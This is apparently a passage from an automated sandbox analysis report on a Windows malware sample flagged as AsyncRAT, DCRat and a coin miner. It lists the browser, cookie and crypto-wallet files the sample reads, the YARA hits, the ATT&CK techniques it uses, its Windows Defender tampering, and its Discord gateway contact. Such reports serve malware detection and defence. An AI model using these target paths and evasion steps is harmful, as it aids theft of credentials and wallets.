                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets

                                  Remote Access Functionality

                                  barindex
                                  Source: Yara matchFile source: 00000010.00000003.1795412848.0000014703693000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000010.00000003.1795412848.0000014703695000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 7704, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI77042\rarreg.key, type: DROPPED
                                  Source: Yara matchFile source: 0000002A.00000002.2525882233.0000000012AFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a24170.3.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a37e08.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a10508.2.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a37e08.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a10508.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 6.0.RuntimeBroker2.0.exe.2227b640000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a24170.3.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: 87Bym0x4Fy.exe PID: 6912, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: RuntimeBroker2.0.exe PID: 7176, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe, type: DROPPED
                                  Source: Yara matchFile source: 29.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 29.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 29.3.svchost.exe.4e4e6ea.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.3.s.exe.71dd711.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 42.0.ChainComServermonitor.exe.300000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 29.3.svchost.exe.4e4e6ea.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0000002A.00000000.1886461269.0000000000302000.00000002.00000001.01000000.00000029.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000015.00000003.1830651243.0000000007241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001D.00000003.1841385534.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001D.00000003.1839390909.0000000005600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Uninstall Information\cmd.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\cscript.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED
                                  Source: Yara matchFile source: 29.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 29.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 29.3.svchost.exe.4e4e6ea.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.3.s.exe.71dd711.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 42.0.ChainComServermonitor.exe.300000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 29.3.svchost.exe.4e4e6ea.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Uninstall Information\cmd.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\cscript.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED
                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity Information111
                                  Scripting
                                  Valid Accounts241
                                  Windows Management Instrumentation
                                  111
                                  Scripting
                                  1
                                  Abuse Elevation Control Mechanism
                                  51
                                  Disable or Modify Tools
                                  1
                                  OS Credential Dumping
                                  2
                                  System Time Discovery
                                  1
                                  Taint Shared Content
                                  1
                                  Archive Collected Data
                                  3
                                  Ingress Tool Transfer
                                  Exfiltration Over Other Network Medium1
                                  Data Encrypted for Impact
                                  CredentialsDomainsDefault Accounts1
                                  Native API
                                  11
                                  DLL Side-Loading
                                  11
                                  DLL Side-Loading
                                  11
                                  Deobfuscate/Decode Files or Information
                                  LSASS Memory3
                                  File and Directory Discovery
                                  Remote Desktop Protocol2
                                  Data from Local System
                                  11
                                  Encrypted Channel
                                  Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts112
                                  Command and Scripting Interpreter
                                  321
                                  Registry Run Keys / Startup Folder
                                  311
                                  Process Injection
                                  1
                                  Abuse Elevation Control Mechanism
                                  Security Account Manager58
                                  System Information Discovery
                                  SMB/Windows Admin Shares1
                                  Clipboard Data
                                  3
                                  Non-Application Layer Protocol
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts3
                                  PowerShell
                                  Login Hook321
                                  Registry Run Keys / Startup Folder
                                  31
                                  Obfuscated Files or Information
                                  NTDS1
                                  Query Registry
                                  Distributed Component Object ModelInput Capture4
                                  Application Layer Protocol
                                  Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script121
                                  Software Packing
                                  LSA Secrets261
                                  Security Software Discovery
                                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                  Timestomp
                                  Cached Domain Credentials2
                                  Process Discovery
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                                  DLL Side-Loading
                                  DCSync161
                                  Virtualization/Sandbox Evasion
                                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                  File Deletion
                                  Proc Filesystem1
                                  Application Window Discovery
                                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt243
                                  Masquerading
                                  /etc/passwd and /etc/shadow1
                                  Remote System Discovery
                                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron161
                                  Virtualization/Sandbox Evasion
                                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
                                  Process Injection
                                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1485949 Sample: 87Bym0x4Fy.exe Startdate: 01/08/2024 Architecture: WINDOWS Score: 100 149 gateway.discord.gg 2->149 173 Antivirus detection for dropped file 2->173 175 Antivirus / Scanner detection for submitted sample 2->175 177 Sigma detected: Capture Wi-Fi password 2->177 179 26 other signatures 2->179 15 87Bym0x4Fy.exe 6 2->15         started        19 powershell.exe 2->19         started        21 cscript.exe 2->21         started        23 2 other processes 2->23 signatures3 process4 file5 143 C:\Users\user\...\RuntimeBroker2.0.exe, PE32+ 15->143 dropped 145 C:\Users\user\AppData\...\RuntimeBroker.exe, PE32+ 15->145 dropped 147 C:\Users\user\AppData\...\87Bym0x4Fy.exe.log, CSV 15->147 dropped 153 Encrypted powershell cmdline option found 15->153 25 RuntimeBroker.exe 13 15->25         started        29 powershell.exe 23 15->29         started        31 RuntimeBroker2.0.exe 14 2 15->31         started        34 powershell.exe 15 15->34         started        155 Loading BitLocker PowerShell Module 19->155 36 conhost.exe 19->36         started        157 Found direct / indirect Syscall (likely to bypass EDR) 21->157 38 WerFault.exe 23->38         started        signatures6 process7 dnsIp8 119 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 25->119 dropped 121 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 25->121 dropped 123 C:\Users\user\AppData\Local\...\python310.dll, PE32+ 25->123 dropped 125 8 other files (7 malicious) 25->125 dropped 211 Found pyInstaller with non standard icon 25->211 40 RuntimeBroker.exe 25->40         started        213 Loading BitLocker PowerShell Module 29->213 42 conhost.exe 29->42         started        151 gateway.discord.gg 162.159.130.234, 443, 49730 CLOUDFLARENETUS United States 31->151 44 WerFault.exe 31->44         started        46 conhost.exe 34->46         started        file9 signatures10 process11 process12 48 cmd.exe 40->48         started        51 SIHClient.exe 40->51         started        signatures13 159 Wscript starts Powershell (via cmd or directly) 48->159 161 Very long command line found 48->161 163 Encrypted powershell cmdline option found 48->163 165 5 other signatures 48->165 53 Build.exe 48->53         started        57 conhost.exe 48->57         started        process14 file15 109 C:\ProgramData\Microsoft\hacn.exe, PE32+ 53->109 dropped 111 C:\ProgramData\Microsoft\based.exe, PE32+ 53->111 dropped 189 Multi AV Scanner detection for dropped file 53->189 191 Machine Learning detection for dropped file 53->191 59 hacn.exe 53->59         started        63 based.exe 53->63         started        signatures16 process17 file18 127 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 59->127 dropped 129 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 59->129 dropped 131 C:\Users\user\AppData\Local\Temp\...\s.exe, PE32 59->131 dropped 139 8 other files (7 malicious) 59->139 dropped 215 Multi AV Scanner detection for dropped file 59->215 217 Machine Learning detection for dropped file 59->217 65 hacn.exe 59->65         started        133 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 63->133 dropped 135 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 63->135 dropped 137 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 63->137 dropped 141 16 other files (15 malicious) 63->141 dropped 219 Very long command line found 63->219 221 Modifies Windows Defender protection settings 63->221 223 Adds a directory exclusion to Windows Defender 63->223 225 2 other signatures 63->225 67 based.exe 63->67         started        signatures19 process20 signatures21 70 cmd.exe 65->70         started        181 Very long command line found 67->181 183 Tries to harvest and steal browser information (history, passwords, etc) 67->183 185 Modifies Windows Defender protection settings 67->185 187 5 other signatures 67->187 72 cmd.exe 67->72         started        75 cmd.exe 67->75         started        77 cmd.exe 67->77         started        79 12 other processes 67->79 process22 signatures23 81 s.exe 70->81         started        85 conhost.exe 70->85         started        199 Wscript starts Powershell (via cmd or directly) 72->199 201 Very long command line found 72->201 203 Encrypted powershell cmdline option found 72->203 97 2 other processes 72->97 205 Adds a directory exclusion to Windows Defender 75->205 87 powershell.exe 75->87         started        89 conhost.exe 75->89         started        207 Modifies Windows Defender protection settings 77->207 91 powershell.exe 77->91         started        93 conhost.exe 77->93         started        209 Tries to harvest and steal WLAN passwords 79->209 95 powershell.exe 79->95         started        99 22 other processes 79->99 process24 file25 105 C:\ProgramData\svchost.exe, PE32 81->105 dropped 107 C:\ProgramData\setup.exe, PE32+ 81->107 dropped 167 Drops PE files with benign system names 81->167 101 svchost.exe 81->101         started        169 Loading BitLocker PowerShell Module 91->169 171 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 99->171 signatures26 process27 file28 113 C:\Users\user\...\ChainComServermonitor.exe, PE32 101->113 dropped 115 pFG3Duil1NAbFHoInF...Rvb98S0ewJA0VkW.vbe, data 101->115 dropped 117 C:\Users\user\...\oGgyulsi03j6EO3sjCC.bat, ASCII 101->117 dropped 193 Antivirus detection for dropped file 101->193 195 Multi AV Scanner detection for dropped file 101->195 197 Machine Learning detection for dropped file 101->197 signatures29

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand
                                  SourceDetectionScannerLabelLink
                                  87Bym0x4Fy.exe69%VirustotalBrowse
                                  87Bym0x4Fy.exe61%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                                  87Bym0x4Fy.exe100%AviraTR/Dropper.Gen
                                  87Bym0x4Fy.exe100%Joe Sandbox ML
                                  SourceDetectionScannerLabelLink
                                  C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe100%AviraHEUR/AGEN.1323342
                                  C:\ProgramData\setup.exe100%AviraTR/CoinMiner.lnxah
                                  C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe100%AviraHEUR/AGEN.1323342
                                  C:\Program Files\Google\Chrome\updater.exe100%AviraTR/CoinMiner.lnxah
                                  C:\ProgramData\svchost.exe100%AviraVBS/Runner.VPG
                                  C:\Users\user\AppData\Local\Temp\VbvGgiO8yC.bat100%AviraBAT/Delbat.C
                                  C:\Program Files\Uninstall Information\cmd.exe100%AviraHEUR/AGEN.1323342
                                  C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe100%Joe Sandbox ML
                                  C:\ProgramData\Microsoft\hacn.exe100%Joe Sandbox ML
                                  C:\ProgramData\setup.exe100%Joe Sandbox ML
                                  C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe100%Joe Sandbox ML
                                  C:\Program Files\Google\Chrome\updater.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe100%Joe Sandbox ML
                                  C:\ProgramData\svchost.exe100%Joe Sandbox ML
                                  C:\Program Files\Uninstall Information\cmd.exe100%Joe Sandbox ML
                                  C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe92%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                  C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe58%VirustotalBrowse
                                  C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe92%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                  C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe58%VirustotalBrowse
                                  C:\Program Files\Google\Chrome\updater.exe71%ReversingLabsWin64.Trojan.SilentCryptoMiner
                                  C:\Program Files\Google\Chrome\updater.exe79%VirustotalBrowse
                                  C:\Program Files\Uninstall Information\cmd.exe92%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                  C:\Program Files\Uninstall Information\cmd.exe58%VirustotalBrowse
                                  C:\ProgramData\Microsoft\based.exe51%ReversingLabsWin64.Trojan.Generic
                                  C:\ProgramData\Microsoft\based.exe47%VirustotalBrowse
                                  C:\ProgramData\Microsoft\hacn.exe71%ReversingLabsWin64.Trojan.Generic
                                  C:\ProgramData\Microsoft\hacn.exe62%VirustotalBrowse
                                  C:\ProgramData\setup.exe71%ReversingLabsWin64.Trojan.SilentCryptoMiner
                                  C:\ProgramData\setup.exe79%VirustotalBrowse
                                  C:\ProgramData\svchost.exe61%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\ProgramData\svchost.exe53%VirustotalBrowse
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe58%ReversingLabsWin32.Trojan.Generic
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe51%VirustotalBrowse
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\VCRUNTIME140.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\VCRUNTIME140.dll0%VirustotalBrowse
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\_bz2.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\_bz2.pyd1%VirustotalBrowse
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\_decimal.pyd3%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\_decimal.pyd1%VirustotalBrowse
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\_hashlib.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\_hashlib.pyd0%VirustotalBrowse
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\_lzma.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\_lzma.pyd4%VirustotalBrowse
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\_socket.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\_socket.pyd1%VirustotalBrowse
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\libcrypto-1_1.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\libcrypto-1_1.dll0%VirustotalBrowse
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\python310.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI68642\python310.dll0%VirustotalBrowse
                                  No Antivirus matches
                                  SourceDetectionScannerLabelLink
                                  gateway.discord.gg0%VirustotalBrowse
                                  No Antivirus matches
                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  gateway.discord.gg
                                  162.159.130.234
                                  truefalse
                                  NameMaliciousAntivirus DetectionReputation
                                  https://gateway.discord.gg/?v=9&encording=jsonfalse
                                    NameSourceMaliciousAntivirus DetectionReputation
